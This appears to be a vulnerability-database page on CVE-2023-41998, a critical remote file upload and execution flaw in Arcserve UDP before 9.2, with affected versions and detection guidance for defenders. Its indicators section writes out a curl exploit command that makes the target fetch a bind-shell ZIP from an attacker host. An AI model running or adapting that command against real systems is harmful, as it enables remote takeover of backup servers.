cbcvebase.
CVE-2023-41998
published 2023-11-27

CVE-2023-41998: Arcserve UDP prior to 9.2 contained a vulnerability in the com.ca.arcflash.rps.webservice.RPSService4CPMImpl interface. A routine exists that allows an…

PriorityP269critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EPSS
15.27%
96.4th percentile
Arcserve UDP prior to 9.2 contained a vulnerability in the com.ca.arcflash.rps.webservice.RPSService4CPMImpl interface. A routine exists that allows an attacker to upload and execute arbitrary files.

Affected

2 ranges
VendorProductVersion rangeFixed in
arcservearcserve_udp< 9.29.2
arcserveudp< 9.29.2

Detection & IOCsextracted from sources · hover to see the quote

path\Engine\BIN\patch\
port8014
urlhttps://<target>:8014/RPSWebServiceImpl/services/RPSService4CPMImpl
filenameshell_bind_tcp.zip
port4444
commandcurl -ki -H 'Content-Type: text/xml' -d 'http://<attacker>:8000/download/shell_bind_tcp.zip' 'https://<target>:8014/RPSWebServiceImpl/services/RPSService4CPMImpl'
  • Monitor for inbound HTTP POST requests with Content-Type: text/xml to the endpoint /RPSWebServiceImpl/services/RPSService4CPMImpl on port 8014, which is the attack vector for CVE-2023-41998.
  • Alert on new files (especially ZIP and EXE files) appearing under the \Engine\BIN\patch\ directory on Arcserve UDP hosts, as this is the drop location used by the downloadAndInstallPatch() exploit routine.
  • Detect child process execution spawned from the Arcserve UDP Tomcat service (e.g., under C:\Program Files\Arcserve\Unified Data Protection\Common\Tomcat), particularly processes running as NT AUTHORITY\SYSTEM.
  • The exploit requires the download URL to contain at least 4 forward slashes; network proxy/IDS rules can look for outbound HTTP requests from the Arcserve UDP service process to external hosts matching this pattern.
  • ·The decompressed EXE executed by the service must share the same base filename as the uploaded ZIP (e.g., foo.zip must contain foo.exe); detection rules for dropped files should account for this naming convention.
Stop checking back — get the weekly exploitation signal.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.